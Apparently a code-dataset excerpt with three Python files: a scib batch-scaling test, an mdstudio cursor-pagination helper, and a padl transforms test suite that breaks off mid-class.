id: string (3-8 chars) | content: string (100-981k chars)
438475
import scanpy as sc
import numpy as np
import scib


def test_scale():
    adata = sc.datasets.blobs()
    scib.pp.scale_batch(adata, 'blobs')
    split = scib.utils.split_batches(adata, 'blobs')
    for i in split:
        # compare against a vector of n_vars zeros; a (0, n_vars) array would
        # broadcast to an empty array and make the assertion trivially true
        assert np.allclose(i.X.mean(0), np.zeros(adata.n_vars))
438498
import json
from typing import Tuple, List, Optional, Callable
from copy import deepcopy

from mdstudio.api.sort_mode import SortMode
from mdstudio.collection import merge_dicts
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value


@chainable
def paginate_cursor(filter, func, meta=None, paging=None, **kwargs):
    # type: (dict, Callable, Optional[dict], Optional[dict]) -> Tuple[List[dict], Optional[dict], Optional[dict]]
    allow_prev = True
    direction = SortMode.Desc

    if not meta:
        meta = {
            'request': json.dumps(filter),
            'limit': 50
        }

    # guard against paging=None before looking up 'limit'
    if paging and 'limit' in paging:
        meta['limit'] = paging['limit']
        allow_prev = False

    if paging or isinstance(paging, dict):
        meta['page'] = 1

    if 'first' in meta:
        merge_dicts(filter, {'_id': {'$lt': meta['first']}})
    elif 'last' in meta:
        merge_dicts(filter, {'_id': {'$gt': meta['last']}})
        direction = SortMode.Asc

    # security fail over and add one extra to check if alive
    meta['limit'] = min(meta['limit'] + 1, 101)

    results = yield func(filter, **{
        'meta': meta,
        'paging': paging,
        'db': {
            'limit': meta['limit'],
            'sort': [('_id', direction)]
        },
        'kwargs': kwargs
    })

    alive = len(results) == meta['limit']
    meta['limit'] -= 1
    results = results[:meta['limit'] if alive else len(results)]

    if 'first' in meta:
        results.reverse()

    next_meta = deepcopy(meta)
    prev_meta = deepcopy(meta)
    next_meta.pop('first', None)
    next_meta.pop('last', None)
    prev_meta.pop('first', None)
    prev_meta.pop('last', None)

    if alive or 'last' in meta:
        next_meta['last'] = results[len(results) - 1]['_id']
        if 'page' in next_meta:
            next_meta['page'] = meta['page'] + 1
    else:
        next_meta = None

    if allow_prev and (alive or 'first' in meta):
        prev_meta['first'] = results[0]['_id']
        if 'page' in prev_meta:
            prev_meta['page'] = meta['page'] - 1
    else:
        prev_meta = None

    return_value((results, prev_meta, next_meta))
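
# A minimal usage sketch (not from the original module; `get_tasks` is a
# hypothetical accessor that honours the injected 'db' options, i.e. a limit
# and a sort on _id, and returns a list of documents). Inside another
# @chainable coroutine the paging handshake looks roughly like:
#
#     results, prev_meta, next_meta = yield paginate_cursor(
#         {'status': 'open'}, get_tasks, paging={'limit': 10})
#
# `next_meta` then carries {'last': <final _id>, 'page': 2, ...}; feeding it
# back in as `meta` on the next call advances the cursor, while `prev_meta`
# (when not None) pages backwards via its 'first' key.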
438545
import os
from collections import OrderedDict
import pytest
import torch
from padl import transforms as pd, transform, Identity, batch, unbatch, group
from padl.transforms import Batchify, Unbatchify, TorchModuleTransform, RequirementNotFound
from padl.dumptools.serialize import value
import padl
from collections import namedtuple
from padl.transforms import load

GLOBAL_1 = 0
GLOBAL_1 = GLOBAL_1 + 5


class PrettyMock:
    @staticmethod
    def text(x):
        return x


@transform
def plus_global(x):
    return x + GLOBAL_1


@transform
def plus_one(x):
    return x + 1


@transform
def append_one(x):
    return x + "one"


@transform
def times_two(x):
    return x * 2


@transform
def plus(x, y):
    return x + y


@transform
def get_info(x):
    return x['info']


@transform
def complex_signature_func_1(a, b=10):
    return a + b


@transform
def complex_signature_func_2(*a, b=10):
    return sum(a) + b


def simple_func(x):
    return x


class SimpleClass:
    def __init__(self, a):
        self.a = a

    def __call__(self, x):
        return x + self.a


@transform
class SimpleClassTransform:
    def __init__(self, a):
        self.a = a

    def __call__(self, x):
        return x + self.a


@transform
class ClassTransformWithManyArguments:
    def __init__(self, a, b, *args, c=1, d=2, **kwargs):
        self.a = a

    def __call__(self, x):
        return x + self.a


@transform
def trans_with_globals(x, y):
    return (plus >> times_two)(x, y)


@transform
class ClassLookup:
    def __init__(self, dic):
        self.dic = dic

    def __call__(self, args):
        return [self.dic.get(x, len(self.dic)) for x in args]


@transform
class Polynomial(torch.nn.Module):
    def __init__(self, a, b, pd_save_options=None):
        super().__init__()
        self.a = torch.nn.Parameter(torch.tensor(float(a)))
        self.b = torch.nn.Parameter(torch.tensor(float(b)))
        if pd_save_options is not None:
            self.pd_save_options = pd_save_options

    def forward(self, x):
        return x**self.a + x**self.b


class PolynomialClass(torch.nn.Module):
    def __init__(self, a, b):
        super().__init__()
        self.a = torch.nn.Parameter(torch.tensor(float(a)))
        self.b = torch.nn.Parameter(torch.tensor(float(b)))

    def forward(self, x):
        return x**self.a + x**self.b


def test_isinstance_of_namedtuple():
    tup = tuple([1, 2, 3])
    namedtup_type = namedtuple('something', 'a b c')
    namedtup_ins = namedtup_type(*tup)
    assert pd._isinstance_of_namedtuple(namedtup_ins)
    assert not pd._isinstance_of_namedtuple(tup)
    assert not pd._isinstance_of_namedtuple(list(tup))
    assert not pd._isinstance_of_namedtuple(1.)
    assert not pd._isinstance_of_namedtuple('something')


class TestNamedTupleOutput:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = plus_one
        request.cls.transform_2 = request.cls.transform_1 >> (times_two + times_two)
        request.cls.transform_3 = request.cls.transform_2 >> (times_two / times_two)

    def test_call(self):
        assert not pd._isinstance_of_namedtuple(self.transform_1(1))
        assert pd._isinstance_of_namedtuple(self.transform_2(1))
        assert pd._isinstance_of_namedtuple(self.transform_3(1))

    def test_infer_apply(self):
        assert not pd._isinstance_of_namedtuple(self.transform_1.infer_apply(1))
        assert pd._isinstance_of_namedtuple(self.transform_2.infer_apply(1))
        assert pd._isinstance_of_namedtuple(self.transform_3.infer_apply(1))

    def test_eval_apply(self):
        assert not any(list(map(pd._isinstance_of_namedtuple, self.transform_1.eval_apply([1, 2, 3]))))
        assert all(list(map(pd._isinstance_of_namedtuple, self.transform_2.eval_apply([1, 2, 3]))))
        assert all(list(map(pd._isinstance_of_namedtuple, self.transform_3.eval_apply([1, 2, 3]))))

    def test_train_apply(self):
        assert not any(list(map(pd._isinstance_of_namedtuple, self.transform_1.train_apply([1, 2, 3]))))
        assert all(list(map(pd._isinstance_of_namedtuple, self.transform_2.train_apply([1, 2, 3]))))
        assert all(list(map(pd._isinstance_of_namedtuple, self.transform_3.train_apply([1, 2, 3]))))


class TestPADLCallTransform:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = plus_one >> (times_two + times_two)
        request.cls.transform_2 = transform(simple_func) + transform(simple_func) \
            + transform(simple_func)
        request.cls.transform_3 = plus_one + times_two >> plus
        request.cls.transform_4 = plus_one + times_two >> complex_signature_func_1
        request.cls.transform_5 = plus_one >> complex_signature_func_1
        request.cls.transform_6 = plus_one + times_two >> complex_signature_func_2

    def test_infer_apply(self):
        assert self.transform_1.infer_apply(1)
        assert self.transform_2.infer_apply(10)
        assert self.transform_3.infer_apply(1.4)
        assert self.transform_4.infer_apply(201)
        assert self.transform_5.infer_apply(11.1)
        assert self.transform_6.infer_apply(19)

    def test_pprintt(self):
        self.transform_1._repr_pretty_(PrettyMock, False)
        self.transform_2._repr_pretty_(PrettyMock, False)
        self.transform_3._repr_pretty_(PrettyMock, False)
        self.transform_4._repr_pretty_(PrettyMock, False)
        self.transform_5._repr_pretty_(PrettyMock, False)
        self.transform_6._repr_pretty_(PrettyMock, False)

    def test_save_load(self, tmp_path, ignore_padl_requirement):
        for transform_ in [self.transform_1, self.transform_2, self.transform_3,
                           self.transform_4, self.transform_5, self.transform_6]:
            transform_.pd_save(tmp_path / 'test.padl', True)
            t_ = pd.load(tmp_path / 'test.padl')
            assert t_.infer_apply(1)


class TestMap:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = ~plus_one
        request.cls.transform_2 = transform(simple_func) / ~plus_one
        request.cls.transform_3 = ~times_two + ~plus_one
        request.cls.transform_4 = transform(lambda x: [x, x, x]) >> ~plus_one
        request.cls.transform_5 = Batchify() >> ~plus_one
        request.cls.transform_6 = (
            Batchify() / Identity()
            >> ~plus_one
        )
        request.cls.transform_7 = (
            Batchify() / Identity()
            >> ~plus_one
            >> Unbatchify() / Identity()
        )

    def test_pprintt(self):
        self.transform_1._repr_pretty_(PrettyMock, False)
        self.transform_2._repr_pretty_(PrettyMock, False)
        self.transform_3._repr_pretty_(PrettyMock, False)
        self.transform_4._repr_pretty_(PrettyMock, False)
        self.transform_5._repr_pretty_(PrettyMock, False)
        self.transform_6._repr_pretty_(PrettyMock, False)

    def test_pd_preprocess(self):
        assert isinstance(self.transform_1.pd_preprocess, pd.Identity)
        assert isinstance(self.transform_2.pd_preprocess, pd.Identity)
        assert isinstance(self.transform_5.pd_preprocess, pd.Batchify)
        assert isinstance(self.transform_6.pd_preprocess, pd.Compose)

    def test_pd_forward(self):
        assert isinstance(self.transform_1.pd_forward, pd.Map)
        assert isinstance(self.transform_2.pd_forward, pd.Parallel)
        assert isinstance(self.transform_5.pd_forward, pd.Map)
        assert isinstance(self.transform_6.pd_forward, pd.Parallel)

    def test_pd_postprocess(self):
        assert isinstance(self.transform_1.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_2.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_5.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_6.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_7.pd_postprocess, pd.Compose)

    def test_infer_apply(self):
        assert self.transform_1.infer_apply([2, 3, 4]) == (3, 4, 5)
        assert self.transform_2.infer_apply((1, [2, 3, 4])) == (1, (3, 4, 5))
        assert self.transform_3.infer_apply([2, 3, 4]) == ((4, 6, 8), (3, 4, 5))
        assert self.transform_4.infer_apply(1) == (2, 2, 2)
        assert self.transform_5.infer_apply([1, 1, 1]) == (2, 2, 2)
        assert self.transform_6.infer_apply([1, 2]) == (2, 3)

    def test_eval_apply(self):
        assert list(self.transform_1.eval_apply([[2, 3], [3, 4]])) == [(3, 4), (4, 5)]
        assert list(self.transform_2.eval_apply(([1, [2, 3]], (2, [3, 4])))) == [(1, (3, 4)), (2, (4, 5))]
        assert list(self.transform_3.eval_apply([[2, 3], [2, 3]])) == \
            [((4, 6), (3, 4)), ((4, 6), (3, 4))]
        assert list(self.transform_4.eval_apply([1])) == [(2, 2, 2)]

    def test_train_apply(self):
        assert list(self.transform_1.train_apply([[2, 3], [3, 4]])) == [(3, 4), (4, 5)]
        assert list(self.transform_2.train_apply(([1, [2, 3]], (2, [3, 4])))) == [(1, (3, 4)), (2, (4, 5))]
        assert list(self.transform_3.eval_apply([[2, 3], [2, 3]])) == \
            [((4, 6), (3, 4)), ((4, 6), (3, 4))]
        assert list(self.transform_4.train_apply([1])) == [(2, 2, 2)]

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply([2, 3, 4]) == (3, 4, 5)
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        t2 = pd.load(tmp_path / 'test.padl')
        assert t2.infer_apply((1, [2, 3, 4])) == (1, (3, 4, 5))
        self.transform_3.pd_save(tmp_path / 'test.padl', True)
        t3 = pd.load(tmp_path / 'test.padl')
        assert t3.infer_apply([2, 3, 4]) == ((4, 6, 8), (3, 4, 5))
        self.transform_4.pd_save(tmp_path / 'test.padl', True)
        t4 = pd.load(tmp_path / 'test.padl')
        assert t4.infer_apply(1) == (2, 2, 2)


class TestParallel:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = plus_one / times_two / times_two
        request.cls.transform_2 = transform(simple_func) / transform(simple_func) / transform(simple_func)
        request.cls.transform_3 = plus_one / plus_one / transform(simple_func)
        request.cls.transform_4 = (
            plus_one / plus_one
            >> transform(lambda x: x[0] * x[1])
        )

    def test_pprintt(self):
        self.transform_1._repr_pretty_(PrettyMock, False)
        self.transform_2._repr_pretty_(PrettyMock, False)
        self.transform_3._repr_pretty_(PrettyMock, False)
        self.transform_4._repr_pretty_(PrettyMock, False)

    def test_output(self):
        in_ = (2, 2, 2)
        out = self.transform_1(in_)
        assert pd._isinstance_of_namedtuple(out)
        assert out._fields == ('plus_one', 'times_two_0', 'times_two_1')
        out = self.transform_2(in_)
        assert pd._isinstance_of_namedtuple(out)
        assert out._fields == ('out_0', 'out_1', 'out_2')
        out = self.transform_3(in_)
        assert pd._isinstance_of_namedtuple(out)
        assert out._fields == ('plus_one_0', 'plus_one_1', 'out_2')

    def test_pd_preprocess(self):
        assert isinstance(self.transform_1.pd_preprocess, pd.Identity)
        assert isinstance(self.transform_4.pd_preprocess, pd.Identity)

    def test_pd_forward(self):
        assert isinstance(self.transform_1.pd_forward, pd.Parallel)
        assert isinstance(self.transform_4.pd_forward, pd.Compose)

    def test_pd_postprocess(self):
        assert isinstance(self.transform_1.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_4.pd_postprocess, pd.Identity)

    def test_infer_apply(self):
        assert self.transform_1.infer_apply((2, 3, 4)) == (3, 6, 8)
        assert self.transform_4.infer_apply((2, 4)) == 15

    def test_eval_apply(self):
        assert list(self.transform_1.eval_apply([(2, 3, 4), (3, 3, 4)])) == [(3, 6, 8), (4, 6, 8)]

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply((2, 3, 4)) == (3, 6, 8)
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')
        self.transform_3.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')


class TestRollout:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = plus_one + times_two + times_two
        request.cls.transform_2 = transform(simple_func) + transform(simple_func) + transform(simple_func)
        request.cls.transform_3 = plus_one + plus_one + transform(simple_func)
        request.cls.transform_4 = (
            (Batchify() >> plus_one)
            + (times_two >> Batchify())
        )
        request.cls.transform_5 = (
            (times_two >> Batchify())
            + (Batchify() >> plus_one)
        )
        request.cls.transform_6 = (
            plus_one / times_two
            >> times_two + times_two
        )

    def test_pprintt(self):
        self.transform_1._repr_pretty_(PrettyMock, False)
        self.transform_2._repr_pretty_(PrettyMock, False)
        self.transform_3._repr_pretty_(PrettyMock, False)
        self.transform_4._repr_pretty_(PrettyMock, False)
        self.transform_5._repr_pretty_(PrettyMock, False)
        self.transform_6._repr_pretty_(PrettyMock, False)

    def test_identity_split(self):
        new_iden = Identity() - 'new_name'
        test = (
            plus_one
            >> batch
            >> new_iden + new_iden
            >> plus
            >> unbatch
            >> new_iden + new_iden
            >> plus
        )
        assert str(test.pd_forward) == str(new_iden + new_iden >> plus)

    def test_output(self):
        in_ = 123
        out = self.transform_1(in_)
        assert pd._isinstance_of_namedtuple(out)
        assert out._fields == ('plus_one', 'times_two_0', 'times_two_1')
        out = self.transform_2(in_)
        assert pd._isinstance_of_namedtuple(out)
        assert out._fields == ('out_0', 'out_1', 'out_2')
        out = self.transform_3(in_)
        assert pd._isinstance_of_namedtuple(out)
        assert out._fields == ('plus_one_0', 'plus_one_1', 'out_2')

    def test_pd_preprocess(self):
        assert isinstance(self.transform_1.pd_preprocess, pd.Identity)
        assert isinstance(self.transform_6.pd_preprocess, pd.Identity)

    def test_pd_forward(self):
        assert isinstance(self.transform_1.pd_forward, pd.Rollout)
        assert isinstance(self.transform_6.pd_forward, pd.Compose)

    def test_pd_postprocess(self):
        assert isinstance(self.transform_1.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_6.pd_postprocess, pd.Identity)

    def test_infer_apply(self):
        assert self.transform_1.infer_apply(2) == (3, 4, 4)
        assert self.transform_4.infer_apply(2) == (3, 4)
        assert self.transform_5.infer_apply(2) == (4, 3)
        assert self.transform_6.infer_apply((2, 2)) == ((3, 4, 3, 4), (3, 4, 3, 4))

    def test_eval_apply(self):
        assert list(self.transform_1.eval_apply([2, 3])) == [(3, 4, 4), (4, 6, 6)]

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl')
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply(2) == (3, 4, 4)
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')
        self.transform_3.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')


class TestCompose:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = (plus_one >> times_two) >> times_two
        request.cls.transform_2 = plus_one >> (times_two >> times_two)
        request.cls.transform_3 = plus_one >> times_two >> times_two
        request.cls.transform_4 = plus_one >> plus_one >> plus_one
        request.cls.transform_5 = (
            plus_one
            >> Batchify()
            >> times_two - 'named_times_two'
            >> times_two
            >> Unbatchify()
        )
        request.cls.transform_6 = (
            times_two
            >> plus_one + plus_one
        )
        request.cls.transform_7 = (
            times_two
            >> plus_one + plus_one
            >> Identity() / Unbatchify()
        )
        request.cls.transform_8 = (
            times_two
            >> Unbatchify()
        )
        request.cls.transform_9 = (
            times_two
            >> Batchify()
            >> Unbatchify()
        )
        request.cls.transform_10 = (
            times_two
            >> Batchify()
            >> Unbatchify()
            >> Unbatchify()
        )

    def test_unbatchify_position(self):
        assert self.transform_7.infer_apply(1) == (3, 3)
        assert self.transform_8.infer_apply(1) == 2
        assert self.transform_9.infer_apply(1) == 2
        with pytest.raises(AssertionError):
            self.transform_10.infer_apply(1)

    def test_pprintt(self):
        self.transform_1._repr_pretty_(PrettyMock, False)
        self.transform_2._repr_pretty_(PrettyMock, False)
        self.transform_3._repr_pretty_(PrettyMock, False)
        self.transform_4._repr_pretty_(PrettyMock, False)
        self.transform_5._repr_pretty_(PrettyMock, False)

    def test_associative(self):
        in_ = 123
        assert self.transform_1(in_) == self.transform_2(in_) == self.transform_3(in_)

    def test_output(self):
        assert self.transform_4(1) == 4

    def test_pd_preprocess(self):
        assert isinstance(self.transform_1.pd_preprocess, pd.Identity)
        assert isinstance(self.transform_5.pd_preprocess, pd.Compose)

    def test_pd_forward(self):
        assert isinstance(self.transform_1.pd_forward, pd.Compose)
        assert isinstance(self.transform_5.pd_forward, pd.Compose)

    def test_pd_postprocess(self):
        assert isinstance(self.transform_1.pd_postprocess, pd.Identity)
        assert isinstance(self.transform_5.pd_postprocess, pd.Unbatchify)

    def test_infer_apply(self):
        assert self.transform_4.infer_apply(1) == 4
        assert self.transform_5.infer_apply(1) == torch.tensor(8)

    def test_eval_apply(self):
        assert list(self.transform_5.eval_apply([1, 1])) == [torch.tensor(8), torch.tensor(8)]

    def test_train_apply(self):
        # default
        assert list(self.transform_5.train_apply([1, 1])) == [torch.tensor(8), torch.tensor(8)]
        # loader kwargs
        for out in list(self.transform_5.train_apply([1, 1, 1, 1], batch_size=2)):
            assert out == torch.tensor(8)
        assert list(self.transform_5.train_apply(
            [1, 2, 1, 2], flatten=True, batch_size=2)
        ) == [torch.tensor(8), torch.tensor(12), torch.tensor(8), torch.tensor(12)]

    def test_all_transforms_1(self):
        c = plus_one >> times_two >> times_two
        all_ = c._pd_all_transforms()
        assert set(all_) == set([plus_one, times_two, c])

    def test_all_transforms_2(self):
        c = plus_one >> times_two >> trans_with_globals
        all_ = c._pd_all_transforms()
        assert set(all_) == set([plus_one, times_two, c, trans_with_globals, plus])

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl')
        _ = pd.load(tmp_path / 'test.padl')
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')
        self.transform_3.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')
        self.transform_4.pd_save(tmp_path / 'test.padl', True)
        t4 = pd.load(tmp_path / 'test.padl')
        assert t4.infer_apply(1) == 4
        self.transform_5.pd_save(tmp_path / 'test.padl', True)
        t5 = pd.load(tmp_path / 'test.padl')
        assert t5.infer_apply(1) == torch.tensor(8)

    def test_getitem(self):
        assert isinstance(self.transform_5[0], pd.Transform)
        assert isinstance(self.transform_5[0:2], pd.Pipeline)
        assert isinstance(self.transform_5[0:2], pd.Compose)
        assert isinstance(self.transform_5['named_times_two'], pd.Transform)
        with pytest.raises(ValueError):
            self.transform_5['other_name']
        with pytest.raises(TypeError):
            self.transform_5[2.1]
        assert isinstance(self.transform_6['plus_one'], pd.Transform)


class TestModel:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        transform_1 = (
            plus_one
            >> Batchify()
            >> times_two
            >> Unbatchify()
            >> plus_one
        )
        transform_2 = (
            plus_one
            >> Batchify()
            >> times_two
            >> Unbatchify()
            >> plus_one
        ) - 'transform_2'
        request.cls.model_1 = (transform_1 / transform_2)
        request.cls.model_2 = (transform_1 + transform_2)
        request.cls.model_3 = (
            plus_one + times_two
            >> plus_one / Batchify()
            >> Batchify() / times_two
        )
        request.cls.model_4 = (
            plus_one + times_two
            >> Batchify()
            >> Polynomial(1, 0) / Identity()
            >> Unbatchify()
            >> plus_one / times_two
        ) - 'model_4'
        request.cls.model_5 = ~transform_1
        request.cls.model_6 = (
            Batchify()
            >> plus_one
            >> plus_one + times_two
        )
        request.cls.model_7 = (
            plus_one + times_two
            >> plus_one / Batchify()
            >> plus_one / plus_one
            >> Batchify() / times_two
            >> Unbatchify()
            >> plus_one / plus_one
        )

    @pytest.fixture(scope='class')
    def to_tensor(self):
        return transform(lambda x: torch.tensor(x))

    @pytest.fixture(scope='class')
    def lin(self):
        return transform(torch.nn.Linear(2, 2))

    @pytest.fixture(scope='class')
    def post(self):
        return transform(lambda x: x.sum(-1).topk(1, -1).indices.item())

    def test_pprintt(self):
        self.model_1._repr_pretty_(PrettyMock, False)
        self.model_2._repr_pretty_(PrettyMock, False)
        self.model_3._repr_pretty_(PrettyMock, False)
        self.model_4._repr_pretty_(PrettyMock, False)
        self.model_5._repr_pretty_(PrettyMock, False)
        self.model_6._repr_pretty_(PrettyMock, False)

    def test_pd_preprocess(self):
        assert isinstance(self.model_1.pd_preprocess, pd.Parallel)
        assert isinstance(self.model_2.pd_preprocess, pd.Rollout)
        assert isinstance(self.model_4.pd_preprocess, pd.Compose)
        assert isinstance(self.model_5.pd_preprocess, pd.Map)
        assert isinstance(self.model_6.pd_preprocess, pd.Batchify)
        assert isinstance(self.model_7.pd_preprocess, pd.Compose)

    def test_pd_forward(self):
        assert isinstance(self.model_1.pd_forward, pd.Parallel)
        assert isinstance(self.model_2.pd_forward, pd.Parallel)
        assert isinstance(self.model_5.pd_forward, pd.Map)
        assert isinstance(self.model_6.pd_forward, pd.Compose)
        assert isinstance(self.model_7.pd_forward, pd.Compose)

    def test_pd_postprocess(self):
        assert isinstance(self.model_1.pd_postprocess, pd.Parallel)
        assert isinstance(self.model_2.pd_postprocess, pd.Parallel)
        assert isinstance(self.model_4.pd_postprocess, pd.Compose)
        assert isinstance(self.model_5.pd_postprocess, pd.Map)
        assert isinstance(self.model_6.pd_postprocess, pd.Identity)
        assert isinstance(self.model_7.pd_postprocess, pd.Compose)

    def test_infer_apply(self):
        assert self.model_1.infer_apply((5, 5)) == (13, 13)
        assert self.model_2.infer_apply(torch.tensor(5)) == (13, 13)
        assert self.model_3.infer_apply(5) == (7, 20)
        assert self.model_4.infer_apply(5) == (8, 20)
        assert self.model_5.infer_apply((5, 5)) == (13, 13)
        assert self.model_6.infer_apply(5) == (7, 12)
        assert self.model_7.infer_apply(5) == (9, 23)

    def test_eval_apply(self):
        assert list(self.model_1.eval_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)]
        assert list(self.model_2.eval_apply(torch.tensor([5, 5]))) == [(13, 13), (13, 13)]
        assert list(self.model_3.eval_apply([5, 6])) == [(7, 20), (8, 24)]
        assert list(self.model_4.eval_apply([5, 6])) == [(8, 20), (9, 24)]
        assert list(self.model_5.eval_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)]
        assert list(self.model_6.eval_apply([5, 6])) == [(7, 12), (8, 14)]
        assert list(self.model_7.eval_apply([5, 6])) == [(9, 23), (10, 27)]

    def test_train_apply(self):
        assert list(self.model_1.train_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)]
        assert list(self.model_2.train_apply(torch.tensor([5, 5]))) == [(13, 13), (13, 13)]
        assert list(self.model_3.train_apply([5, 6])) == [(7, 20), (8, 24)]
        assert list(self.model_4.train_apply([5, 6])) == [(8, 20), (9, 24)]
        assert list(self.model_5.train_apply([(5, 5), (5, 5)])) == [(13, 13), (13, 13)]

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        pd.save(self.model_1, tmp_path / 'test.padl', compress=True, force_overwrite=True)
        m1 = pd.load(tmp_path / 'test.padl')
        assert m1.infer_apply((5, 5)) == (13, 13)
        pd.save(self.model_2, tmp_path / 'test.padl', compress=True, force_overwrite=True)
        m2 = pd.load(tmp_path / 'test.padl')
        assert m2.infer_apply(5) == (13, 13)
        pd.save(self.model_3, tmp_path / 'test1.padl', force_overwrite=True)
        m3 = pd.load(tmp_path / 'test1.padl')
        assert m3.infer_apply(5) == (7, 20)
        self.model_4.pd_save(tmp_path / 'test1.padl', force_overwrite=True)
        m4 = pd.load(tmp_path / 'test1.padl')
        assert m4.infer_apply(5) == (8, 20)
        self.model_5.pd_save(tmp_path / 'test1.padl', force_overwrite=True)
        m5 = pd.load(tmp_path / 'test1.padl')
        assert m5.infer_apply((5, 5)) == (13, 13)

    def test_pd_splits_compose(self, to_tensor, lin, post):
        t = (to_tensor
             >> batch
             >> (lin >> lin) + (lin >> lin) + (lin >> lin)
             >> (unbatch >> post) / (unbatch >> post) / (unbatch >> post)
             )
        t_preprocess = to_tensor >> batch
        t_forward = group((lin >> lin) + (lin >> lin) + (lin >> lin))
        t_postprocess = group((unbatch >> post) / (unbatch >> post) / (unbatch >> post))
        assert str(t.pd_preprocess) == str(t_preprocess)
        assert str(t.pd_forward) == str(t_forward)
        assert str(t.pd_postprocess) == str(t_postprocess)

    def test_pd_splits_compose_with_group(self, to_tensor, lin, post):
        t = (to_tensor
             >> batch
             >> group((lin >> lin) + (lin >> lin)) + (lin >> lin)
             >> group((unbatch >> post) / (unbatch >> post)) / (unbatch >> post)
             )
        t_preprocess = to_tensor >> batch
        t_forward = group(group((lin >> lin) + (lin >> lin)) + (lin >> lin))
        t_postprocess = group(group((unbatch >> post) / (unbatch >> post)) / (unbatch >> post))
        assert str(t.pd_preprocess) == str(t_preprocess)
        assert str(t.pd_forward) == str(t_forward)
        assert str(t.pd_postprocess) == str(t_postprocess)

    def test_pd_splits_parallel(self, to_tensor, lin):
        t = (((to_tensor >> batch >> lin) + (to_tensor >> batch >> lin))
             / ((to_tensor >> batch) + (to_tensor >> batch))
             ) - 'name'
        g = t / Identity()
        t_preprocess = group(group((to_tensor >> batch) + (to_tensor >> batch))
                             / group((to_tensor >> batch) + (to_tensor >> batch)))
        g_preprocess = group((t_preprocess - 'name') / Identity())
        t_forward = group(group(lin / lin) / Identity())
        g_forward = group((t_forward - 'name') / Identity())
        assert str(t.pd_preprocess) == str(t_preprocess)
        assert str(g.pd_preprocess) == str(g_preprocess)
        assert str(t.pd_forward) == str(t_forward)
        assert str(g.pd_forward) == str(g_forward)

    def test_pd_splits_rollout(self, to_tensor, lin):
        t = ((to_tensor >> batch >> lin) / (to_tensor >> batch >> lin)
             + (to_tensor >> batch) / (to_tensor >> batch)
             ) - 'name'
        g = t + Identity()
        t_preprocess = group(group(to_tensor / to_tensor) + group(to_tensor / to_tensor)) - 'name'
        g_preprocess = group(t_preprocess + Identity())
        t_forward = group(group(lin / lin) / Identity()) - 'name'
        g_forward = group(t_forward / Identity())
        assert str(t.pd_preprocess) == str(t_preprocess)
        assert str(g.pd_preprocess) == str(g_preprocess)
        assert str(t.pd_forward) == str(t_forward)
        assert str(g.pd_forward) == str(g_forward)


class TestFunctionTransform:
    @pytest.fixture(autouse=True, scope='class')
    def init(self, request):
        request.cls.transform_1 = plus_one
        request.cls.transform_2 = get_info
        request.cls.transform_3 = plus_global

    def test_pd_preprocess(self):
        assert isinstance(self.transform_1.pd_preprocess, pd.Identity)

    def test_pd_forward(self):
        assert isinstance(self.transform_1.pd_forward, pd.FunctionTransform)

    def test_pd_postprocess(self):
        assert isinstance(self.transform_1.pd_postprocess, pd.Identity)

    def test_infer_apply(self):
        assert self.transform_1.infer_apply(5) == 6
        assert self.transform_3.infer_apply(5) == 10

    def test_eval_apply(self):
        out = list(self.transform_1.eval_apply([5, 6]))
        assert len(out) == 2
        assert out[0] == 6
        assert out[1] == 7
        out = list(self.transform_2.eval_apply([{'info': 'hello'}, {'info': 'dog'}]))
        assert len(out) == 2
        assert out[0] == 'hello'
        assert out[1] == 'dog'

    def test_all_transforms(self):
        all_ = trans_with_globals._pd_all_transforms()
        assert set(all_) == set([plus, times_two, trans_with_globals])

    def test_pd_to(self):
        self.transform_1.pd_to('cpu')
        assert self.transform_1.pd_device == 'cpu'

    def test_save_and_load(self, tmp_path, ignore_padl_requirement):
        self.transform_1.pd_save(tmp_path / 'test.padl', True)
        t1 = pd.load(tmp_path / 'test.padl')
        assert t1.infer_apply(5) == 6
        self.transform_2.pd_save(tmp_path / 'test.padl', True)
        _ = pd.load(tmp_path / 'test.padl')
        self.transform_3.pd_save(tmp_path / 'test.padl', True)
        t3 = pd.load(tmp_path / 'test.padl')
        assert t3.infer_apply(5) == 10


def test_name():
    assert (plus_one - 'p1')._pd_name == 'p1'
    assert plus_one._pd_name is None


class TestTransformDeviceCheck:
    @pytest.fixture(autouse=True, scope='class')
